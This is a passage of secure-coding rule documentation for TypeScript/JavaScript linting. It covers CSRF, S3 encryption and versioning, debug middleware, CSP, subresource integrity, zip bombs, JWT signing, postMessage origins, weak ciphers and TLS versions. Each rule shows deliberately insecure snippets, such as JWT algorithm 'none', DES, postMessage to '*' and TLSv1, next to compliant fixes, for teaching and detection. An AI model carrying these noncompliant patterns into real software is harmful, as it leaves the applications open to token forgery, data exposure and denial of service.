app.post('/money_transfer', parseForm, csrfProtection, function (req, res) { // Compliant
  res.send('Money transferred')
});

Protection provided by Express.js CSURF middleware is enabled on unsafe methods:

let csrf = require('csurf');
let express = require('express');

app.use(csrf({ cookie: true, ignoreMethods: ["GET"] })); // Compliant

See

typescript:S6245

Server-side encryption (SSE) encrypts an object (not the metadata) as it is written to disk (where the S3 bucket resides) and decrypts it as it is read from disk. This doesn’t change the way the objects are accessed: as long as the user has the necessary permissions, objects are retrieved as if they were unencrypted. Thus, SSE only helps in the event of disk thefts, improper disposal of disks, and other attacks on the AWS infrastructure itself.

There are three SSE options:

  • Server-Side Encryption with Amazon S3-Managed Keys (SSE-S3)
    • AWS manages encryption keys and the encryption itself (with AES-256) on its own.
  • Server-Side Encryption with Customer Master Keys (CMKs) Stored in AWS Key Management Service (SSE-KMS)
    • AWS manages the encryption (AES-256) of objects and encryption keys provided by the AWS KMS service.
  • Server-Side Encryption with Customer-Provided Keys (SSE-C)
    • AWS manages only the encryption (AES-256) of objects with encryption keys provided by the customer. AWS doesn’t store the customer’s encryption keys.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure needs to comply with regulations, like HIPAA or PCI DSS, and other standards.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to use SSE. Choosing the appropriate option depends on the level of control required for the management of encryption keys.

Sensitive Code Example

Server-side encryption is not used:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'default'
}); // Sensitive

Bucket encryption is disabled by default.

Compliant Solution

Server-side encryption with AWS KMS-managed keys (SSE-KMS) is used:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    encryption: s3.BucketEncryption.KMS_MANAGED
});

// Alternatively, with a KMS key managed by the user:

new s3.Bucket(this, 'id', {
    encryption: s3.BucketEncryption.KMS,
    encryptionKey: access_key
});

See

typescript:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

errorhandler Express.js middleware should not be used in production:

const express = require('express');
const errorhandler = require('errorhandler');

let app = express();
app.use(errorhandler()); // Sensitive

Compliant Solution

errorhandler Express.js middleware used only in development mode:

const express = require('express');
const errorhandler = require('errorhandler');

let app = express();

if (process.env.NODE_ENV === 'development') {
  app.use(errorhandler());
}

See

typescript:S5604

Powerful features are browser features (geolocation, camera, microphone, …) that can be accessed through JavaScript APIs and may require a permission granted by the user. These features can have a high impact on privacy and user security, so they should only be used when they are really necessary to implement the critical parts of an application.

This rule highlights intrusive permissions when they are requested with the (future standard, currently experimental) web browser permissions query API or with the specific APIs related to the permission. It is highly recommended to customize this rule with the permissions considered intrusive in the context of the web application.

Ask Yourself Whether

  • Some powerful features used by the application are not really necessary.
  • Users are not clearly informed why and when powerful features are used by the application.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • In order to respect user privacy it is recommended to avoid using intrusive powerful features.

Sensitive Code Example

When using the geolocation API, Firefox, for example, retrieves personal information such as nearby wireless access points and the IP address, and sends it to the default geolocation service provider, Google Location Services:

navigator.permissions.query({name:"geolocation"}).then(function(result) {
});  // Sensitive: geolocation is a powerful feature with high privacy concerns

navigator.geolocation.getCurrentPosition(function(position) {
  console.log("coordinates x="+position.coords.latitude+" and y="+position.coords.longitude);
}); // Sensitive: geolocation is a powerful feature with high privacy concerns

Compliant Solution

If geolocation is required, always explain to the user why the application needs it and prefer requesting an approximate location when possible:

<html>
<head>
    <title>
        Retailer website example
    </title>
</head>
<body>
    Type a city, street or zip code where you want to retrieve the closest retail locations of our products:
    <form method="post">
        <input type="text" value="New York"> <!-- Compliant -->
    </form>
</body>
</html>

See

typescript:S5725

Using remote artifacts without integrity checks can lead to the unexpected execution of malicious code in the application.

On the client side, where front-end code is executed, malicious code could:

  • impersonate users' identities and take advantage of their privileges on the application.
  • add silent malware that monitors users' sessions and captures sensitive secrets.
  • gain access to sensitive clients' personal data.
  • deface the application or otherwise affect its general availability.
  • mine cryptocurrencies in the background.

Likewise, a compromised software piece that would be deployed on a server-side application could badly affect the application’s security. For example, server-side malware could:

  • access and modify sensitive technical and business data.
  • elevate its privileges on the underlying operating system.
  • use the compromised application as a pivot to attack the local network.

By ensuring that a remote artifact is exactly what it is supposed to be before using it, the application is protected from unexpected changes applied to it before it is downloaded.
In particular, integrity checks make it possible to identify an artifact that was replaced by malware on the publication website or, in a more benign scenario, that was legitimately changed by its author.

Important note: downloading an artifact over HTTPS only protects it while in transit from one host to another. It provides authenticity and integrity checks for the network stream only. It does not ensure the authenticity or security of the artifact itself.

Ask Yourself Whether

  • The artifact is a file intended to execute code.
  • The artifact is a file that is intended to configure or affect running code in some way.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

To check the integrity of a remote artifact, hash verification is the most reliable solution. It ensures that the file has not been modified since the fingerprint was computed.

In this case, the artifact’s hash must:

  • Be computed with a secure hash algorithm such as SHA512, SHA384 or SHA256.
  • Be compared with a secure hash that was not downloaded from the same source.

To do so, the best option is to add the hash in the code explicitly, by following Mozilla’s official documentation on how to generate integrity strings.

Note: Use this fix together with version binding on the remote file. Avoid downloading files named "latest" or similar, so that the front-end pages do not break when the code of the latest remote artifact changes.

Sensitive Code Example

The following code sample uses neither integrity checks nor version pinning:

let script = document.createElement("script");
script.src = "https://cdn.example.com/latest/script.js"; // Sensitive
script.crossOrigin = "anonymous";
document.head.appendChild(script);

Compliant Solution

let script = document.createElement("script");
script.src = "https://cdn.example.com/v5.3.6/script.js";
script.integrity = "sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC";
script.crossOrigin = "anonymous";
document.head.appendChild(script);

See

typescript:S5728

Content security policy (CSP) fetch directives are part of a W3C standard that lets a server specify, via an HTTP header, the origins from which the browser is allowed to load resources. This can help mitigate the risk of cross-site scripting (XSS) attacks and reduce the privileges used by an application. If the website doesn’t define a CSP header, the browser applies the same-origin policy by default.

Content-Security-Policy: default-src 'self'; script-src 'self' http://www.example.com

In the above example, all resources are allowed from the website where this header is set, and script resources fetched from www.example.com are also authorized:

<img src="selfhostedimage.png"> <!-- will be loaded because the default-src 'self' directive applies -->
<img src="http://www.example.com/image.png"> <!-- will NOT be loaded because the default-src 'self' directive applies -->
<script src="http://www.example.com/library.js"></script> <!-- will be loaded because the script-src 'self' http://www.example.com directive applies -->
<script src="selfhostedscript.js"></script> <!-- will be loaded because the script-src 'self' http://www.example.com directive applies -->
<script src="http://www.otherexample.com/library.js"></script> <!-- will NOT be loaded because the script-src 'self' http://www.example.com directive applies -->
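A policy like the one above is just a semicolon-separated list of directives, each a directive name followed by its allowed sources. As a minimal sketch (the cspHeader helper is hypothetical, not part of helmet), such a header value can be assembled like this:

```javascript
// Hypothetical helper: serializes a directive map into a
// Content-Security-Policy header value.
function cspHeader(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(' ')}`)
    .join('; ');
}

console.log(cspHeader({
  'default-src': ["'self'"],
  'script-src': ["'self'", 'http://www.example.com'],
}));
// → default-src 'self'; script-src 'self' http://www.example.com
```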

Ask Yourself Whether

  • The resources of the application are fetched from various untrusted locations.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement content security policy fetch directives, in particular the default-src directive, and continue to properly sanitize and validate all inputs of the application; CSP fetch directives are only a tool to reduce the impact of cross-site scripting attacks.

Sensitive Code Example

In an Express.js application, the code is sensitive if the helmet contentSecurityPolicy middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();
app.use(
    helmet({
      contentSecurityPolicy: false, // Sensitive
    })
);

Compliant Solution

In an Express.js application, a standard way to implement CSP is the helmet contentSecurityPolicy middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();
app.use(helmet.contentSecurityPolicy()); // Compliant

See

typescript:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data that expands into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers compress irrelevant data (e.g. a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data; in general, the data compression ratio for most legitimate archives is 1 to 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold. In particular, it is not recommended to recursively expand archives (an entry of an archive could itself be an archive).
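The three checks above can be combined into a single guard that is called once per archive entry, whatever the extraction library. A minimal sketch (the checkArchiveEntry function and the {uncompressedSize, compressedSize} entry shape are our assumptions, not a real module API):

```javascript
// Hypothetical guard implementing the three recommendations:
// entry count, total uncompressed size, and per-entry compression ratio.
function checkArchiveEntry(state, entry, limits) {
  state.fileCount += 1;
  if (state.fileCount > limits.maxFiles) {
    throw new Error('Reached max. number of files');
  }

  state.totalSize += entry.uncompressedSize;
  if (state.totalSize > limits.maxSize) {
    throw new Error('Reached max. size');
  }

  if (entry.compressedSize > 0 &&
      entry.uncompressedSize / entry.compressedSize > limits.maxRatio) {
    throw new Error('Reached max. compression ratio');
  }
}

const limits = { maxFiles: 10000, maxSize: 1e9, maxRatio: 10 };
const state = { fileCount: 0, totalSize: 0 };

// A benign entry (2:1 ratio) passes all three checks.
checkArchiveEntry(state, { uncompressedSize: 1000, compressedSize: 500 }, limits);
```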

Sensitive Code Example

For tar module:

const tar = require('tar');

tar.x({ // Sensitive
  file: 'foo.tar.gz'
});

For adm-zip module:

const AdmZip = require('adm-zip');

let zip = new AdmZip("./foo.zip");
zip.extractAllTo("."); // Sensitive

For jszip module:

const fs = require("fs");
const JSZip = require("jszip");

fs.readFile("foo.zip", function(err, data) {
  if (err) throw err;
  JSZip.loadAsync(data).then(function (zip) { // Sensitive
    zip.forEach(function (relativePath, zipEntry) {
      if (!zip.file(zipEntry.name)) {
        fs.mkdirSync(zipEntry.name);
      } else {
        zip.file(zipEntry.name).async('nodebuffer').then(function (content) {
          fs.writeFileSync(zipEntry.name, content);
        });
      }
    });
  });
});

For yauzl module:

const yauzl = require('yauzl');

yauzl.open('foo.zip', function (err, zipfile) {
  if (err) throw err;

  zipfile.on("entry", function(entry) {
    zipfile.openReadStream(entry, function(err, readStream) {
      if (err) throw err;
      // TODO: extract
    });
  });
});

For extract-zip module:

const extract = require('extract-zip')

async function main() {
  let target = __dirname + '/test';
  await extract('test.zip', { dir: target }); // Sensitive
}
main();

Compliant Solution

For tar module:

const tar = require('tar');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB

let fileCount = 0;
let totalSize = 0;

tar.x({
  file: 'foo.tar.gz',
  filter: (path, entry) => {
    fileCount++;
    if (fileCount > MAX_FILES) {
      throw 'Reached max. number of files';
    }

    totalSize += entry.size;
    if (totalSize > MAX_SIZE) {
      throw 'Reached max. size';
    }

    return true;
  }
});

For adm-zip module:

const AdmZip = require('adm-zip');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

let fileCount = 0;
let totalSize = 0;
let zip = new AdmZip("./foo.zip");
let zipEntries = zip.getEntries();
zipEntries.forEach(function(zipEntry) {
    fileCount++;
    if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
    }

    let entrySize = zipEntry.getData().length;
    totalSize += entrySize;
    if (totalSize > MAX_SIZE) {
        throw 'Reached max. size';
    }

    let compressionRatio = entrySize / zipEntry.header.compressedSize;
    if (compressionRatio > THRESHOLD_RATIO) {
        throw 'Reached max. compression ratio';
    }

    if (!zipEntry.isDirectory) {
        zip.extractEntryTo(zipEntry.entryName, ".");
    }
});

For jszip module:

const fs = require("fs");
const pathmodule = require("path");
const JSZip = require("jszip");

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB

let fileCount = 0;
let totalSize = 0;
let targetDirectory = __dirname + '/archive_tmp';

fs.readFile("foo.zip", function(err, data) {
  if (err) throw err;
  JSZip.loadAsync(data).then(function (zip) {
    zip.forEach(function (relativePath, zipEntry) {
      fileCount++;
      if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
      }

      // Prevent ZipSlip path traversal (S6096)
      const resolvedPath = pathmodule.join(targetDirectory, zipEntry.name);
      if (!resolvedPath.startsWith(targetDirectory)) {
        throw 'Path traversal detected';
      }

      if (!zip.file(zipEntry.name)) {
        fs.mkdirSync(resolvedPath);
      } else {
        zip.file(zipEntry.name).async('nodebuffer').then(function (content) {
          totalSize += content.length;
          if (totalSize > MAX_SIZE) {
            throw 'Reached max. size';
          }

          fs.writeFileSync(resolvedPath, content);
        });
      }
    });
  });
});

Be aware that due to the similar structure of sensitive and compliant code the issue will be raised in both cases. It is up to the developer to decide if the implementation is secure.

For yauzl module:

const yauzl = require('yauzl');

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

yauzl.open('foo.zip', function (err, zipfile) {
  if (err) throw err;

  let fileCount = 0;
  let totalSize = 0;

  zipfile.on("entry", function(entry) {
    fileCount++;
    if (fileCount > MAX_FILES) {
      throw 'Reached max. number of files';
    }

    // The uncompressedSize comes from the zip headers, so it might not be trustworthy.
    // Alternatively, calculate the size from the readStream.
    let entrySize = entry.uncompressedSize;
    totalSize += entrySize;
    if (totalSize > MAX_SIZE) {
      throw 'Reached max. size';
    }

    if (entry.compressedSize > 0) {
      let compressionRatio = entrySize / entry.compressedSize;
      if (compressionRatio > THRESHOLD_RATIO) {
        throw 'Reached max. compression ratio';
      }
    }

    zipfile.openReadStream(entry, function(err, readStream) {
      if (err) throw err;
      // TODO: extract
    });
  });
});

Be aware that due to the similar structure of sensitive and compliant code the issue will be raised in both cases. It is up to the developer to decide if the implementation is secure.

For extract-zip module:

const extract = require('extract-zip')

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

async function main() {
  let fileCount = 0;
  let totalSize = 0;

  let target = __dirname + '/foo';
  await extract('foo.zip', {
    dir: target,
    onEntry: function(entry, zipfile) {
      fileCount++;
      if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
      }

      // The uncompressedSize comes from the zip headers, so it might not be trustworthy.
      // Alternatively, calculate the size from the readStream.
      let entrySize = entry.uncompressedSize;
      totalSize += entrySize;
      if (totalSize > MAX_SIZE) {
        throw 'Reached max. size';
      }

      if (entry.compressedSize > 0) {
        let compressionRatio = entrySize / entry.compressedSize;
        if (compressionRatio > THRESHOLD_RATIO) {
          throw 'Reached max. compression ratio';
        }
      }
    }
  });
}
main();

See

typescript:S6252

S3 buckets can be versioned. When an S3 bucket is unversioned, a new version of an object overwrites the existing one in the bucket.

It can lead to unintentional or intentional information loss.

Ask Yourself Whether

  • The bucket stores information that requires high availability.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to enable S3 versioning, which makes it possible to retrieve and restore previous versions of an object.

Sensitive Code Example

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    versioned: false // Sensitive
});

The default value of versioned is false, so the absence of this parameter is also sensitive.

Compliant Solution

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    versioned: true
});

See

typescript:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in jsonwebtoken

Code examples

The following code contains examples of JWT encoding and decoding without a strong cipher algorithm.

Noncompliant code example

const jwt = require('jsonwebtoken');

jwt.sign(payload, key, { algorithm: 'none' }); // Noncompliant

const jwt = require('jsonwebtoken');

jwt.verify(token, key, {
    expiresIn: 360000,
    algorithms: ['none'] // Noncompliant
}, callbackcheck);

Compliant solution

const jwt = require('jsonwebtoken');

jwt.sign(payload, key, { algorithm: 'HS256' });

const jwt = require('jsonwebtoken');

jwt.verify(token, key, {
    expiresIn: 360000,
    algorithms: ['HS256']
}, callbackcheck);

How does this work?

Always sign your tokens

The foremost measure to enhance JWT security is to ensure that every JWT you issue is signed. Unsigned tokens are like open books that anyone can tamper with. Signing your JWTs ensures that any alterations to the tokens after they have been issued can be detected. Most JWT libraries support a signing function, and using it is usually as simple as providing a secret key when the token is created.

Choose a strong cipher algorithm

It is not enough to merely sign your tokens. You need to sign them with a strong cipher algorithm. Algorithms like HS256 (HMAC using SHA-256) are considered secure for most purposes. But for an additional layer of security, you could use an algorithm like RS256 (RSA Signature with SHA-256), which uses a private key for signing and a public key for verification. This way, even if someone gains access to the public key, they will not be able to forge tokens.

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.

Resources

Standards

typescript:S2819

Why is this an issue?

Browsers allow message exchanges between Window objects of different origins.

Because any window can send or receive messages from another window, it is important to verify the sender’s/receiver’s identity:

  • When sending a message with the postMessage method, the receiver’s identity should be defined (the wildcard keyword (*) should not be used).
  • When receiving a message with a message event, the sender’s identity should be verified using the origin and possibly source properties.

Noncompliant code example

When sending a message:

var iframe = document.getElementById("testiframe");
iframe.contentWindow.postMessage("secret", "*"); // Noncompliant: * is used

When receiving a message:

window.addEventListener("message", function(event) { // Noncompliant: no checks are done on the origin property.
  console.log(event.data);
});

Compliant solution

When sending a message:

var iframe = document.getElementById("testsecureiframe");
iframe.contentWindow.postMessage("hello", "https://secure.example.com"); // Compliant

When receiving a message:

window.addEventListener("message", function(event) {

  if (event.origin !== "http://example.org") // Compliant
    return;

  console.log(event.data)
});

Resources

typescript:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Node.js

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

const crypto = require('crypto');

crypto.createCipheriv("DES", key, iv); // Noncompliant

Compliant solution

const crypto = require('crypto');

crypto.createCipheriv("AES-256-GCM", key, iv);

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

typescript:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Node.js

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

const crypto = require('crypto');

crypto.createCipheriv("AES-128-CBC", key, iv); // Noncompliant

Compliant solution

Example with a symmetric cipher, AES:

const crypto = require('crypto');

crypto.createCipheriv("AES-256-GCM", key, iv);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR
  • EAX: encrypt-then-authenticate-then-translate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

typescript:S4787

This rule is deprecated; use S4426, S5542, S5547 instead.

Encrypting data is security-sensitive. It has led in the past to the following vulnerabilities:

Proper encryption requires both the encryption algorithm and the key to be strong. Obviously the private key needs to remain secret and be renewed regularly. However these are not the only means to defeat or weaken an encryption.

This rule flags function calls that initiate encryption/decryption.

Ask Yourself Whether

  • the private key might not be random or strong enough, or the same key might be reused for a long time.
  • the private key might be compromised. It can happen when it is stored in an unsafe place or when it was transferred in an unsafe manner.
  • the key exchange is made without properly authenticating the receiver.
  • the encryption algorithm is not strong enough for the level of protection required. Note that encryption algorithms strength decreases as time passes.
  • the chosen encryption library is deemed unsafe.
  • a nonce is used, and the same value is reused multiple times, or the nonce is not random.
  • the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
  • the CBC (Cipher Block Chaining) algorithm is used for encryption, and its IV (Initialization Vector) is not generated using a secure random algorithm, or it is reused.
  • the Advanced Encryption Standard (AES) encryption algorithm is used with an insecure mode. See the recommended practices for more information.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Generate encryption keys using secure random algorithms.
  • When generating cryptographic keys (or key pairs), it is important to use a key length that provides enough entropy against brute-force attacks. For the Blowfish algorithm the key should be at least 128 bits long, while for the RSA algorithm it should be at least 2048 bits long.
  • Regenerate the keys regularly.
  • Always store the keys in a safe location and transfer them only over safe channels.
  • If there is an exchange of cryptographic keys, check first the identity of the receiver.
  • Only use strong encryption algorithms. Check regularly that the algorithm is still deemed secure. It is also imperative that they are implemented correctly. Use only encryption libraries which are deemed secure. Do not define your own encryption algorithms as they will most probably have flaws.
  • When a nonce is used, generate it randomly every time.
  • When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP).
  • When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to crypto-analysis attacks like "Chosen-Plaintext Attacks". Thus a secure random algorithm should be used. An IV value should be associated to one and only one encryption cycle, because the IV’s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.
  • The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be preferred to the following combinations, which are not secure:
    • Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it does not hide data patterns well. In some senses, it doesn’t provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all.
    • Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.

Sensitive Code Example

// === Client side ===
crypto.subtle.encrypt(algo, key, plainData); // Sensitive
crypto.subtle.decrypt(algo, key, encData); // Sensitive
// === Server side ===
const crypto = require("crypto");
const cipher = crypto.createCipher(algo, key); // Sensitive
const cipheriv = crypto.createCipheriv(algo, key, iv); // Sensitive
const decipher = crypto.createDecipher(algo, key); // Sensitive
const decipheriv = crypto.createDecipheriv(algo, key, iv); // Sensitive
const pubEnc = crypto.publicEncrypt(key, buf); // Sensitive
const privDec = crypto.privateDecrypt({ key: key, passphrase: secret }, pubEnc); // Sensitive
const privEnc = crypto.privateEncrypt({ key: key, passphrase: secret }, buf); // Sensitive
const pubDec = crypto.publicDecrypt(key, privEnc); // Sensitive

See

typescript:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Node.js

Code examples

Noncompliant code example

Node.js offers multiple ways to set weak TLS protocols. For https and tls, the following options are used, and other third-party libraries rely on them as well.

The first is secureProtocol:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  secureProtocol: 'TLSv1_method' // Noncompliant
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

